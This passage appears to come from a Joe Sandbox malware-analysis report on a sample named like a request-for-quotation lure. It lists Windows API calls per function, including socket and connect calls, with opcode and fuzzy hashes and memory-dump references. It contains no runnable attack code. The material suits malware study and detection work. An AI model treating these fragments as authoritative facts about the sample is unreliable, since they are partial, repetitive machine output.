                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableMessageSend$LongShow
                                                        • String ID:
                                                        • API String ID: 142311417-0
                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                        • _wcslen.LIBCMT ref: 004458FB
                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 3087257052-0
                                                        • Opcode ID: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                        • Opcode Fuzzy Hash: c49d34497af2ecac3aa55d01bbb9afec773c3294f63314f04cdc4b683a0905e5
                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                        APIs
                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 245547762-0
                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                        • String ID:
                                                        • API String ID: 2338827641-0
                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                        • String ID:
                                                        • API String ID: 4023252218-0
                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                        APIs
                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                        • String ID:
                                                        • API String ID: 1489400265-0
                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                        APIs
                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                        • String ID:
                                                        • API String ID: 1042038666-0
                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041780F
                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                        • __getptd.LIBCMT ref: 00417826
                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                        • __lock.LIBCMT ref: 00417844
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                        APIs
                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                        • String ID:
                                                        • API String ID: 2403457894-0
                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                        APIs
                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                        • __freefls@4.LIBCMT ref: 00415209
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                        • String ID:
                                                        • API String ID: 4247068974-0
                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 5$8$^
                                                        • API String ID: 0-3622883839
                                                        • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                        • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                        • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                        • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: )$U$\
                                                        • API String ID: 0-3705770531
                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                        APIs
                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
